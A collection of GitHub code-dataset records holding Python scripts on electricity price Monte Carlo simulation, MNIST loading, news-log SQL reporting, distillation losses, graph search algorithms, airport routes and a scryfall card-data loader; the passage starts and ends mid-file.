pd.read_csv(\"data.csv\", index_col=0, parse_dates=True)\r\ndf.sort_index(inplace = True)\r\ndf = df.resample('30min').mean()\r\n\r\n\r\n#=======================================================================\r\n# MONTE CARLO SIMULATION\r\n#=======================================================================\r\n\r\n# Define function that performs Monte Carlo simulation\r\ndef rand_diff():\r\n '''Monte Carlo simulation of price difference on a single time\r\n period. It calculates the difference between randomly generated\r\n imbalance and day-ahead prices 10,000 times.\r\n \r\n Variables\r\n ----------\r\n f_imb, f_dam : interp1d\r\n Functions interpolated to the quantile forecasts of imbalance\r\n and day-ahead prices, respectively.\r\n \r\n Returns\r\n ----------\r\n df_diff : pandas.DataFrame\r\n One-column DataFrame with 10,000 rows.\r\n The column name corresponds to the time period.\r\n '''\r\n diff_rand = []\r\n for i in range(10000):\r\n y_diff = f_imb(random.uniform(0.05, 0.95)) - f_dam(random.uniform(0.05, 0.95))\r\n diff_rand.append(y_diff)\r\n df_diff = pd.DataFrame(diff_rand, columns=[y_dam.name])\r\n return (df_diff)\r\n\r\n\r\n# Day-ahead price forecast quantiles\r\ndf_dam = df[['lower90_dam', 'lower80_dam', 'lower50_dam', 'point_dam',\r\n 'upper50_dam', 'upper80_dam', 'upper90_dam']]\r\n\r\n# Imbalance price forecast quantiles\r\ndf_imb = df[['lower90_imb', 'lower80_imb', 'lower50_imb', 'point_imb', \r\n 'upper50_imb', 'upper80_imb', 'upper90_imb']]\r\n\r\n# List of corresponding probabilities\r\nx = [0.05, 0.10, 0.25, 0.50, 0.75, 0.90, 0.95]\r\n\r\n\r\n# Run Monte Carlo simulation on each time period in the test set\r\ndf_mc = pd.DataFrame()\r\nfor i in range(len(df_dam)):\r\n y_dam = df_dam.iloc[i]\r\n y_imb = df_imb.iloc[i]\r\n\r\n # Interpolate quadratic function to quantiles\r\n f_dam = interp1d(x, y_dam, kind='quadratic')\r\n f_imb = interp1d(x, y_imb, kind='quadratic')\r\n\r\n # Run Monte Carlo simulation\r\n df_mc = pd.concat([df_mc, rand_diff()], axis=1)\r\n\r\n\r\n#=======================================================================\r\n# DATA ANALYSIS\r\n#=======================================================================\r\n\r\n# - - - Descriptive statistics for each distribution - - -\r\nmc_prob = [(df_mc[col] > 0).sum()/float(len(df_mc[col]))\r\n for col in df_mc.columns] # probability of positive price difference\r\nmc_mean = [df_mc[col].mean() for col in df_mc.columns] # mean\r\nmc_median = [df_mc[col].median() for col in df_mc.columns] # median\r\nmc_std = [df_mc[col].std() for col in df_mc.columns] # std. dev.\r\n\r\n# 5, 10, 25, 75, 90, 95% quantiles\r\nmc_q05 = [df_mc[col].quantile(0.05) for col in df_mc.columns]\r\nmc_q10 = [df_mc[col].quantile(0.10) for col in df_mc.columns]\r\nmc_q25 = [df_mc[col].quantile(0.25) for col in df_mc.columns]\r\nmc_q75 = [df_mc[col].quantile(0.75) for col in df_mc.columns]\r\nmc_q90 = [df_mc[col].quantile(0.90) for col in df_mc.columns]\r\nmc_q95 = [df_mc[col].quantile(0.95) for col in df_mc.columns]\r\n\r\n\r\n# Store statistics in DataFrame \r\nmc_res = pd.DataFrame({'prob_positive':mc_prob, 'mc_mean':mc_mean,\r\n 'mc_median':mc_median, 'mc_std':mc_std,\r\n 'q05':mc_q05, 'q10':mc_q10, 'q25':mc_q25,\r\n 'q75':mc_q75, 'q90':mc_q90, 'q95':mc_q95\r\n },\r\n index = df.index)\r\n","repo_name":"ggoretti/phd-thesis","sub_path":"Electricity Price Forecasting/Monte_Carlo.py","file_name":"Monte_Carlo.py","file_ext":"py","file_size_in_byte":3547,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"17781193113","text":"import numpy as np\nfrom tensorflow import keras\n\n\ndef fetch_mnist_digit(ndim):\n # Load the data and split it between train and test sets\n (x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()\n\n # Scale images to the [0, 1] range\n # x_train = x_train.astype(\"float32\") / 255\n # x_test = x_test.astype(\"float32\") / 255\n # Make sure images have shape (28, 28, 1)\n x_train = x_train.reshape(x_train.shape[0], ndim, ndim, 1).astype(\"float32\") / 255.0\n x_test = x_test.reshape(x_test.shape[0], ndim, ndim, 1).astype(\"float32\") / 255.0\n print(\"x_train shape:\", x_train.shape)\n print(x_train.shape[0], \"train samples\")\n print(x_test.shape[0], \"test samples\")\n\n return (x_train, y_train), (x_test, y_test)\n","repo_name":"rkhosroshahli/ssl-vae","sub_path":"fetch_data.py","file_name":"fetch_data.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"70594324155","text":"#! /usr/bin/env python\nimport psycopg2\n\nDBNAME = \"news\"\n\n\n''' 1. What are the most popular three articles of all time? '''\n\n\ndef most_article():\n \"\"\" This function uses the tables article and log\n to return the most accessed articles \"\"\"\n\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n c.execute(\"\"\"\n SELECT articles.title, count(log.path) AS views\n FROM articles, log\n WHERE log.path = '/article/' || articles.slug\n GROUP BY articles.title\n ORDER BY VIEWs DESC LIMIT 3\n \"\"\")\n rows = c.fetchall()\n\n print(\"***The most popular three articles of all time***\")\n for title, views in rows:\n print('\"{}\" - {} views'.format(title, views))\n print(\" \\n \")\n\n db.close()\n\n\n'''2. Who are the most popular article authors of all time? '''\n\n\ndef most_authors():\n \"\"\" This function uses the tables article, authors and log\n to return the most accessed article authors based on article VIEWs\"\"\"\n\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n c.execute(\"\"\"\n SELECT authors.name, count(log.path) AS views\n FROM authors, log, articles\n WHERE log.path = '/article/' || articles.slug\n AND articles.author = authors.id\n GROUP BY authors.name\n ORDER BY views DESC;\n \"\"\")\n rows = c.fetchall()\n\n print(\"***The most popular article authors of all time***\")\n for name, views in rows:\n print('{} - {} views'.format(name, views))\n print(\" \\n \")\n\n db.close()\n\n\n'''3. On which days did more than 1% of requests lead to errors? '''\n\n\ndef percent_errors():\n \"\"\" It retuns the day with more than 1% requests errors \"\"\"\n\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n\n c.execute(\"\"\"\n CREATE VIEW access AS SELECT date(time) AS tdate,\n count(*) AS views\n FROM log\n GROUP BY date(time)\n ORDER BY date(time);\n \"\"\")\n c.execute(\"\"\"\n CREATE VIEW lerrors AS SELECT date(time) AS edate,\n count(*) AS errors\n FROM log\n WHERE status LIKE '%4%'\n GROUP BY time::date\n ORDER BY date(time);\n \"\"\")\n c.execute(\"\"\"\n CREATE VIEW percent as\n SELECT lerrors.edate,\n cast(errors * 100 AS double precision) / views AS p\n FROM access, lerrors\n WHERE access.tdate = lerrors.edate;\n \"\"\")\n\n c.execute(\"SELECT * FROM percent WHERE p > 1 \")\n rows = c.fetchall()\n\n print(\"***Days with more than 1% requests errors***\")\n for row in rows:\n print('{0:%B %d, %Y} - {1:.2f}% errors'.format(row[0], row[1]))\n print(\" \\n \")\n\n db.close()\n\n\nif __name__ == \"__main__\":\n \"\"\" Call the three functions and show the results \"\"\"\n\n most_article()\n most_authors()\n percent_errors()\n","repo_name":"cristianacmc/Log-Analysis","sub_path":"reporting.py","file_name":"reporting.py","file_ext":"py","file_size_in_byte":2788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"20262164022","text":"import os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../../../\"))\nimport unittest\nimport pandas as pd\nfrom karura.core.dataframe_extension import DataFrameExtension\nfrom karura.core.insights.na_frequency_insight import NAFrequencyCheckInsight\n\n\nclass TestNAFrequencyInsight(unittest.TestCase):\n\n def test_insight(self):\n d = {\n \"category\": pd.Series([\"a\", \"b\", \"c\", \"b\", \"c\", \"a\", \"a\", \"b\"]),\n \"with_50_na\": pd.Series([\"a\", None, \"c\", None, None, None, \"a\", \"b\"]),\n \"with_20_na\": pd.Series([\"a\", \"b\", \"c\", \"b\", None, \"a\", None, \"b\"])\n }\n df = pd.DataFrame(d)\n dfe = DataFrameExtension(df)\n\n insight = NAFrequencyCheckInsight()\n self.assertTrue(insight.is_applicable(dfe))\n insight.init_description()\n\n insight.adopt(dfe)\n self.assertEqual(len(dfe.df.columns), 2)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n\n\n","repo_name":"chakki-works/karura","sub_path":"tests/karura_test/insights/test_na_frequency_insight.py","file_name":"test_na_frequency_insight.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"96"} +{"seq_id":"28312962700","text":"import csv\n\nwordfrequencies = {}\n\nwith open('/media/echobot/Volume/home/simon/uni/masterarbeit/data/de/corpus/news.2013.de.shuffled.corpus.bigram') as f:\n print(\"Reading corpus and counting words...\")\n num_lines = 36218033;\n current_line = 1;\n for line in f:\n if current_line % 100000 == 0:\n print(\"Line %d / %d\" % (current_line, num_lines))\n words = line.split();\n for word in words:\n if not wordfrequencies.has_key(word):\n wordfrequencies[word] = 0;\n\n wordfrequencies[word] += 1\n current_line += 1\n\nprint(\"Saving word frequencies...\")\nwith open('wordfrequencies_bigrams.csv', 'wb') as csv_file:\n writer = csv.writer(csv_file)\n for key, value in wordfrequencies.items():\n writer.writerow([key, value])\n\n\n\n\n\n\n\n","repo_name":"obiwan87/master-thesis","sub_path":"python/echolex/prototyping/calculate_word_frequency.py","file_name":"calculate_word_frequency.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"71933562877","text":"import torch\nfrom torch.nn import functional as F\nfrom torch import nn\n\n\nclass HintonCrossEntropyLoss(nn.Module):\n def __init__(self, teacher: nn.Module, ratio: float = 1.0, temperature: float = 1.0, reduction: str = 'mean'):\n super(HintonCrossEntropyLoss, self).__init__()\n\n self.ratio = ratio\n self.temperature = temperature\n assert reduction in ('mean', 'sum', 'none')\n self.reduction = reduction\n\n self.add_module('teacher', teacher)\n\n teacher.eval()\n\n def forward(self, x: torch.Tensor, y_pred: torch.Tensor, y: torch.Tensor) -> torch.Tensor:\n children = dict(self.named_children())\n num_classes = y_pred.shape[-1]\n\n with torch.no_grad():\n y_soft: torch.Tensor = children['teacher'](x)\n\n y_pred_t = (y_pred / self.temperature).softmax(-1)\n y_pred = y_pred.softmax(-1)\n y = F.one_hot(y, num_classes)\n y_soft_t = (y_soft / self.temperature).softmax(-1)\n\n return self._cross_entropy(y, y_pred) + self.ratio * self._cross_entropy(y_soft_t, y_pred_t)\n\n def _cross_entropy(self, y: torch.Tensor, y_pred: torch.Tensor):\n raw = -(y * y_pred.log()).sum(-1)\n if self.reduction == 'mean':\n return raw.mean()\n elif self.reduction == 'sum':\n return raw.sum()\n else:\n return raw\n\n\nclass LogitsDistillingLoss(HintonCrossEntropyLoss):\n \"\"\"\n The loss function to distill logits in SKD.\n \"\"\"\n def __init__(self, teacher, **kwargs):\n \"\"\"\n Initialize an instance of logits distilling loss.\n\n :param teacher: teacher model to provide soft target\n \"\"\"\n super(LogitsDistillingLoss, self).__init__(teacher)\n\n self.hardness_factor = 1 if 'hardness_factor' not in kwargs else kwargs[\n 'hardness_factor']\n\n def forward(self, x: torch.Tensor, y_pred: torch.Tensor, y: torch.Tensor) -> torch.Tensor:\n children = dict(self.named_children())\n num_classes = y_pred.shape[-1]\n\n with torch.no_grad():\n y_soft: torch.Tensor = children['teacher'](x)\n\n y_pred = (y_pred / y_pred.norm(dim=-1, keepdim=True)).softmax(-1)\n y_hard = F.one_hot(y, num_classes).type(torch.float32)\n y_soft = (y_soft / y_soft.norm(dim=-1, keepdim=True)).softmax(-1)\n\n y_soft[y_soft.argmax(\n dim=-1) != y] = y_hard[y_soft.argmax(dim=-1) != y] * self.hardness_factor\n y_soft = y_soft.softmax(dim=-1)\n y_pred = y_pred.softmax(dim=-1)\n y_hard[y_hard > 0.5] = 1.0 / self.temperature\n y_hard[y_hard < 0.5] = 1.0 - 1.0 / self.temperature\n\n return self._cross_entropy(y_hard, y_pred) + self.ratio * self._cross_entropy(y_soft, y_pred)\n","repo_name":"chenrz925/SMLDist","sub_path":"tasnem_har/models/loss_functions.py","file_name":"loss_functions.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"71294793597","text":"from odoo import api, fields, models, _\nfrom odoo.tools.misc import formatLang\nimport time\nfrom odoo.exceptions import UserError\n\n\nclass sale_order(models.Model):\n _inherit = \"sale.order\"\n\n is_manual_amount = fields.Boolean(string='Manual Amount',default=False)\n\n new_amount_untaxed = fields.Float(string='New Amount Untaxed')\n new_amount_tax = fields.Float(string='New Amount Tax')\n new_amount_total = fields.Float(string='New Amount Total')\n\n @api.multi\n def button_global_discount(self):\n res = super(sale_order, self).button_global_discount()\n if self.is_manual_amount:\n self.apply_price()\n # print ('-8zzzzzzzz')\n return res\n\n @api.multi\n def action_confirm(self):\n # print ('-bbbbbbbbbb')\n super(sale_order,self).action_confirm()\n if self.is_manual_amount:\n self.apply_price()\n # print ('---7yyyyyyyyyy')\n return True\n\n @api.multi\n def apply_price(self):\n\n if self.new_amount_untaxed:\n self.amount_untaxed = self.new_amount_untaxed\n if self.new_amount_tax:\n self.amount_tax = self.new_amount_tax\n if self.new_amount_total:\n self.amount_total = self.new_amount_total\n # print ('------apply price')\n # @api.multi\n # def action_done(self):\n # res = super(stock_picking,self).action_done()\n # if self.picking_type_id.new_sequence_id:\n # self.picking_number = self.picking_type_id.sudo().new_sequence_id.next_by_id()\n # return res\n\n\n","repo_name":"support-itaas/app_shop","sub_path":"manual_untax_tax_amount/models/sale_order.py","file_name":"sale_order.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"3473233801","text":"import numpy as np\nfrom advectionGP.sensors import FixedSensorModel \nfrom advectionGP.kernels import EQ \nfrom advectionGP.constraints import NonNegConstraint\nfrom advectionGP.models.mesh_1d_ode_model import AdjointSecondOrderODEModel as ODEModel\nfrom advectionGP.kernels import meshgridndim\n\nclass ODEModelSample():\n def __init__(self,ls=1,non_neg=False,N_feat=200,k_0=0.001,u=0.001,eta=0.001,Npoints=10,shift=0,source=None):\n \"\"\"\n Generates a sample from our ODE model (with different hyperparameters). Option available to restrict it to non-negative samples\n - non_neg = False (default): sample from our standard ODE model\n - = True: sample from the non-negative prior\n - = 'softplus' sample from our standard ODE model, but then softplus the source to make it non-negative\n The shift parameter shifts the synthetic source up/down before applying the softplus function\n \"\"\"\n tlocL = np.linspace(1,19,Npoints) \n X= np.zeros((len(tlocL),2)) \n\n X[:,0] = tlocL\n X[:,1] = X[:,0]+0.1\n\n sensors = FixedSensorModel(X,0.1) # establish sensor model arguments are sensor locations and spatial averaging\n \n boundary = ([0],[20])# edges of the grid - in units of time\n k = EQ(ls, 2.0) # generate EQ kernel arguments are lengthscale and variance\n res = [400] # grid size for time, x and y\n m = ODEModel(resolution=res,boundary=boundary,N_feat=N_feat,noiseSD=0.1,kernel=k,sensormodel=sensors,k_0=k_0,u=u,eta=eta)\n if source is None:\n if non_neg=='softplus':\n #from https://stackoverflow.com/a/51828104\n def softplus(x): return np.log1p(np.exp(-np.abs(x))) + np.maximum(x, 0)\n z = np.random.randn(N_feat)\n source=m.computeSourceFromPhi(z)+shift # Compute source\n source = softplus(source*2)/2\n \n else:\n if non_neg:\n m.computeModelRegressors()\n Xnonneg = meshgridndim(m.boundary,200,False)\n nnc = NonNegConstraint(m,np.array([[]]),Xnonneg,thinning=2,burnin=20,jitter=0.002,verbose=True,meanZ = np.zeros(N_feat),covZ = np.eye(N_feat),startpointnormalised=True)\n Zs_nonneg = nnc.sample(1)\n z = Zs_nonneg[0,:]\n else:\n z = np.random.randn(N_feat) \n\n source=(m.computeSourceFromPhi(z))# Compute source\n \n conc=m.computeResponse(source) # Compute concentration - runs advection diffusion forward model\n Y= m.computeObservations(addNoise=True) # Compute observations with noise uses m.sensormodel for observation locations\n \n self.X = X\n self.Y = Y\n self.source = source\n self.conc = conc\n self.boundary = boundary\n self.m = m\n","repo_name":"SheffieldML/advectionGPdatasets","sub_path":"advectionGPdatasets/ode_modelsample.py","file_name":"ode_modelsample.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"5125041711","text":"import networkx as nx\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# print(dir(nx))\n# print(dir(pd))\n# print(help(nx.all_shortest_paths))\nans_1 = {\n 'A': ['B', 'G', 'H'],\n 'B': ['A', 'D', 'C'],\n 'C': ['B', 'D', 'E'],\n 'D': ['B', 'C', 'E', 'F', 'G', 'H'],\n 'E': ['C', 'D', 'F'],\n 'F': ['E', 'D', 'G'],\n 'G': ['A', 'F', 'D', 'H'],\n 'H': ['G', 'D', 'A']\n}\n\nG1 = nx.from_dict_of_lists(ans_1)\n# nx.draw_networkx(G, with_labels=True, node_color='Red', node_size=100)\n# plt.show(block=True)\n# node = nx.number_of_nodes(G)\n# # print(\"number of nodes {}\".format(node))\n# edges = nx.number_of_edges(G)\n# print(\"number of edges '{}' and node '{}'\".format(edges, node))\n# print(\"this the {} is connected {}\".format(ans_1, nx.is_connected(G)))\n\n\nroute = pd.read_csv('air_routes.csv', usecols=['source', 'dest', 'count'])\nG = nx.from_pandas_edgelist(route, 'source', 'dest', edge_attr='count')\n# nx.draw_networkx(G, with_labels=True, node_color='Green', node_size=10)\n# plt.show(block=True)\nprint(\" number of Airport '{}'\".format(nx.number_of_nodes(G)))\nprint(\" number of routes between two airport {}\".format(nx.number_of_edges(G)))\nshort = nx.shortest_paths.all_shortest_paths(G, 'ALB', 'SFO')\nprint(nx.is_tree(G1))\nprint(nx.is_connected(G1))\n\n","repo_name":"rushikeshnakhate/AI-Module2","sub_path":"week2/createGrapth.py","file_name":"createGrapth.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"20757629702","text":"import sys\nimport math\n\nclass Grafo(object):\n\n\t\"\"\"Construtor da classe Grafo\"\"\"\n\tdef __init__(self, dados = None):\n\t\tself.dados = dados\n\t\tself.lista_adjacencia = {}\n\n\tdef cria_lista_adjacencia(self):\n\n\t\ttry:\n\t\t\t#percorro a lista de arestas\n\t\t\tfor i in self.dados['arestas']:\n\t\t\t\t#verifico se elas não possui peso\n\t\t\t\tif self.dados['tem_peso'] == False:\n\t\t\t\t\t#verifica se o vertice de origem está presente na lista de adjacencia\n\t\t\t\t\tif not i[0] in self.lista_adjacencia:\n\t\t\t\t\t\t#se nao tiver crio uma lista vazia para este vetor\n\t\t\t\t\t\tself.lista_adjacencia[i[0]] = []\n\t\t\t\t\t#adiciono na lista do vertice de origem, o vertice de destino e o peso 1\n\t\t\t\t\tself.lista_adjacencia[i[0]].append([i[1], 1])\n\t\t\t\t\t#verifico se o grafo é direcionado ou um digrafo\n\t\t\t\t\tif self.dados['eh_digrafo'] == False:\n\t\t\t\t\t\t# verifico se o vertice destino está na lista de adjacencia, se nao tiver crio um lista para ela\n\t\t\t\t\t\tif not i[1] in self.lista_adjacencia:\n\t\t\t\t\t\t\tself.lista_adjacencia[i[1]] = [] #cria a lista vazia\n\t\t\t\t\t\t#se nao existi o elemento origem na lista destino, adiciono ele\n\t\t\t\t\t\tif not i[0] in self.lista_adjacencia[i[1]]: \n\t\t\t\t\t\t\tself.lista_adjacencia[i[1]].append([i[0], 1])\n\t\t\t\telse:\n\t\t\t\t\tif not i[0] in self.lista_adjacencia:\n\t\t\t\t\t\tself.lista_adjacencia[i[0]] = []\n\n\t\t\t\t\tself.lista_adjacencia[i[0]].append([i[1], int( i[2] )])\n\n\t\t\t\t\tif self.dados['eh_digrafo'] == False:\n\t\t\t\t\t\tif not i[1] in self.lista_adjacencia:\n\t\t\t\t\t\t\tself.lista_adjacencia[i[1]] = []\n\t\t\t\t\t\tif not i[0] in self.lista_adjacencia[i[1]]:\n\t\t\t\t\t\t\tself.lista_adjacencia[i[1]].append([i[0],int( i[2] )])\n\n\t\t\treturn True\n\t\texcept:\n\t\t\treturn False\n\n\n\tdef calcula_distancia(self, caminho):\n\t\tv_atual = caminho.pop(0)\n\t\tdistancia = 0\n\n\t\ttry:\n\t\t\twhile len(caminho) > 0:\n\n\t\t\t\tfor aresta in self.lista_adjacencia[v_atual]:\n\n\t\t\t\t\tif caminho[0] == aresta[0]:\n\t\t\t\t\t\tdistancia += aresta[1]\n\t\t\t\t\t\tv_atual = caminho.pop(0)\n\t\t\t\t\t\tbreak;\n\n\t\t\treturn distancia\n\t\texcept:\n\t\t\treturn None\n\n\n\tdef busca_em_largura(self, origem, destino):\n\n\t\tv_atual = origem\n\t\tfila = []\n\t\tvisitados = []\n\t\trespostas = [[v_atual]]\n\n\t\ttry:\n\t\t\twhile v_atual != destino:\n\n\t\t\t\tif v_atual in self.lista_adjacencia:\n\t\t\t\t\tif not v_atual in visitados:\n\t\t\t\t\t\tfor i in self.lista_adjacencia[v_atual]:\n\t\t\t\t\t\t\tif i[0] not in visitados:\n\t\t\t\t\t\t\t\tvisitados += [v_atual]\n\t\t\t\t\t\t\t\tfila.append(i[0])\n\t\t\t\telse:\n\t\t\t\t\tvisitados += [v_atual]\n\n\t\t\t\tif fila:\n\t\t\t\t\trespostas.append(list(fila))\n\t\t\t\t\tv_atual = fila.pop(0)\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\n\t\t\treturn respostas\n\t\texcept:\n\t\t\treturn None\n\n\t\"\"\" profundidade usando pilha\n\tdef __busca_em_profundidade(self, origem, destino):\n\n\t\tv_atual = origem\n\t\tpilha = []\n\t\tvisitados = []\n\t\trespostas = [v_atual]\n\n\t\twhile v_atual != destino:\n\n\t\t\t#se o vertice atual ainda nao foi visitado\n\t\t\tif not v_atual in visitados:\n\t\t\t\tvisitados.append(v_atual) #adiciona a lista de visitados\n\t\t\t\tpilha.append(v_atual) #adiciona a pilha\n\n\t\t\texiste_vizinho = [False] #lista auxiliar que vai verificar se existe visito para meu vertice atual\n\n\t\t\t#verifica se meu vertice atual possui vizinhos\n\t\t\tif v_atual in self.lista_adjacencia:\n\t\t\t\t#percorro a lista de vizinhos\n\t\t\t\tfor i in self.lista_adjacencia[v_atual]:\n\t\t\t\t\t#se meu vizinho ainda nao foi visitado\n\t\t\t\t\tif not i[0] in visitados:\n\t\t\t\t\t\texiste_vizinho[0] = True #primeira posicao vai afirmar que existe vizinho que ainda nao foi visitado\n\t\t\t\t\t\texiste_vizinho.append(i[0]) #segunda posicao guarda o valor do vizinho\n\t\t\t\t\t\tbreak\n\t\t\telse: #se nao possui vizinhos\n\t\t\t\tpilha.pop(-1) #volto para o vertice anterior\n\t\t\t\tv_atual = pilha[len(pilha) - 1] # meu vertice atual recebe o vertice anterior\n\t\t\t\trespostas.append(v_atual)\n\t\t\t\tvisitados.append(v_atual) #falo que esse vertice que nao possui vizinhos ja foi vizitado\n\t\t\t\t#respostas.pop(-1) #removo ele da pilha de resposta\n\t\t\t\tcontinue #continue informa para meu loop parar aqui e começar na proxima volta\n\n\t\t\t#verifico se existe vizinho (filhos do vertice atual) a serem percorridos\n\t\t\tif existe_vizinho[0]:\n\t\t\t\tv_atual = existe_vizinho[1] #o vertice atual agora é o vizinho\n\t\t\t\trespostas.append(v_atual) #coloca o elemento na nossa pilha de resposta\n\t\t\telse: #se nao existe um vizinho\n\t\t\t\tpilha.pop(-1) #removo o elemento do topo da pilha\n\t\t\t\tv_atual = pilha[len(pilha) - 1] #vertice passa a ser o ultimo elemento da pilha \n\t\t\t\trespostas.append(v_atual)\n\t\t\t\t#respostas.pop(-1) #removo da pilha de resposta\n\t\t\t\t#se a pilha estiver vazia, paro o loop com break\n\t\t\t\tif len(pilha) == 0:\n\t\t\t\t\tbreak\n\t\t\t\n\n\t\treturn respostas \n\t\"\"\"\n\n\tdef busca_em_profundidade(self, origem, destino):\n\n\t\tfila = []\n\t\tvisitados = []\n\t\trespostas = [[origem]]\n\t\tv_atual = origem\n\n\t\ttry:\n\t\t\twhile v_atual != destino:\n\n\t\t\t\tif v_atual in self.lista_adjacencia:\n\t\t\t\t\t\n\t\t\t\t\tif not v_atual in visitados:\n\t\t\t\t\t\tindice = 0\n\t\t\t\t\t\tfor i in self.lista_adjacencia[v_atual]:\n\t\t\t\t\t\t\tif i[0] not in visitados:\n\t\t\t\t\t\t\t\tvisitados += [v_atual]\n\t\t\t\t\t\t\t\tfila.insert(indice, i[0])\n\t\t\t\t\t\t\t\tindice += 1\n\t\t\t\telse:\n\t\t\t\t\tvisitados += [v_atual]\n\n\t\t\t\tif len(fila) > 0:\n\t\t\t\t\trespostas.append(list(fila))\n\t\t\t\t\tv_atual = fila.pop(0)\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\t\t\t\n\t\t\treturn respostas\n\t\texcept:\n\t\t\treturn None\n\n\tdef dijkstra(self, origem, destino):\n\n\t\tv_atual = []\n\t\tdistancia = {}\n\t\tvisitados = []\n\t\tv_anterior = {}\n\t\tprioridade = []\n\n\t\t#Cria peso infinito para todas as arestas\n\t\tfor i in self.lista_adjacencia:\n\t\t\tfor j in self.lista_adjacencia[i]:\n\t\t\t\tdistancia[j[0]] = math.inf\n\n\t\tdistancia[origem] = 0\n\n\t\tprioridade.append([origem, distancia[origem]])\n\n\t\ttry:\n\t\t\twhile len(prioridade) > 0:\n\n\t\t\t\tv_atual = list(prioridade.pop(0))\n\n\t\t\t\tif v_atual[0] in self.lista_adjacencia:\n\n\t\t\t\t\tif not v_atual[0] in visitados:\n\n\t\t\t\t\t\tvisitados.append(v_atual)\n\n\t\t\t\t\t\tfor i in self.lista_adjacencia[v_atual[0]]:\n\n\t\t\t\t\t\t\tif distancia[i[0]] > (distancia[v_atual[0]] + i[1]):\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tdistancia[i[0]] = distancia[v_atual[0]] + i[1]\n\t\t\t\t\t\t\t\tprioridade.append( [ i[0], distancia[i[0]] ] )\n\t\t\t\t\t\t\t\tv_anterior[i[0]] = v_atual[0]\n\n\t\t\t\telse:\n\t\t\t\t\tcontinue\n\n\t\t\tcaminho = [destino]\n\t\t\tv_aux = destino\n\n\t\t\twhile(True):\n\n\t\t\t\tif v_aux in v_anterior:\n\t\t\t\t\tcaminho.append( v_anterior[v_aux] )\n\t\t\t\t\tv_aux = v_anterior[v_aux]\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\n\t\t\treturn {'caminho': caminho, 'distancia': distancia[destino]}\n\t\texcept:\n\t\t\treturn None\n\n\tdef prim(self, origem):\n\n\t\ttry:\n\t\t\tvisitados = [str(origem)]\n\t\t\tvertices = list(self.dados['vertices'])\n\t\t\tvertices.remove(str(origem))\n\t\t\tdistancia = 0\n\t\t\trespostas = {'caminho': [], 'distancia': None}\n\n\t\t\twhile len(vertices) > 0:\n\n\t\t\t\ta_menor = math.inf\n\t\t\t\tv_menor = None\n\t\t\t\tv_atual = None\n\n\t\t\t\tfor v in visitados:\n\t\t\t\t\tif v in self.lista_adjacencia:\n\t\t\t\t\t\tfor i in self.lista_adjacencia[v]:\n\n\t\t\t\t\t\t\tif not i[0] in visitados:\n\n\t\t\t\t\t\t\t\tif i[1] < a_menor:\n\t\t\t\t\t\t\t\t\ta_menor = i[1]\n\t\t\t\t\t\t\t\t\tv_menor = i[0]\n\t\t\t\t\t\t\t\t\tv_atual = v\n\t\t\t\t\t\t\t\t\tdistancia += i[1]\n\n\t\t\t\trespostas['caminho'].append( list([v_atual, v_menor, a_menor]) )\n\n\t\t\t\tvisitados.append(v_menor)\n\t\t\t\tvertices.remove(v_menor)\n\t\t\t\n\t\t\trespostas['distancia'] = distancia\n\n\t\t\treturn respostas\n\t\texcept:\n\t\t\treturn None\n","repo_name":"robsonalvesbh/grafos","sub_path":"Models/Grafo.py","file_name":"Grafo.py","file_ext":"py","file_size_in_byte":6954,"program_lang":"python","lang":"pt","doc_type":"code","stars":4,"dataset":"github-code","pt":"96"} +{"seq_id":"4127495507","text":"# This is a sample Python script.\n\n# Press Umschalt+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\nimport requests\nimport pandas as pd\nfrom sqlalchemy import create_engine\nimport json\nimport util\n\nclass DbLoader():\n \"\"\"\n Class to handle the data I/O from the scryfall and mySQL database.\n \"\"\"\n def __init__(self, \n credentials: dict, \n run_id: int ):\n self.run_id = run_id\n self.credentials = credentials\n\n def fetch_data(self) -> pd.DataFrame:\n \"\"\"\n Fetches the scryfall bulk-data from the API and returns the daily updated data as a pandas DataFrame.\n :return: DataFrame with bulk-data\n \"\"\"\n api_path = \"https://api.scryfall.com/bulk-data\"\n # Get info for bulk data download\n print(\"Fetching data from scryfall: {api_path}\".format(api_path=api_path))\n r = requests.get(api_path)\n print(\"Statuscode: \", r.status_code)\n tmp_json = r.json()\n dl_url = tmp_json['data'][0]['download_uri']\n print(\"Downloading bulk-data: \", dl_url)\n r_dl = requests.get(dl_url)\n print(\"Complete! \")\n # load json file into pandas dataframe\n print(\"Loading JSON file to pandas DataFrame\")\n df = pd.DataFrame.from_dict(data=r_dl.json(), orient='columns')\n return df\n\n def fetch_table_from_db(self, run_id: int=None, table_name: str='bulk_data') -> pd.DataFrame():\n \"\"\"\n Fetches a table corresponding to a run_id and table_name from the mySQL database and returns it as a pandas DataFrame.\n :param run_id: run_id from the selected table.\n :param table_name: Name of the table to be fetched from the database.\n :return: DataFrame with bulk-data\n 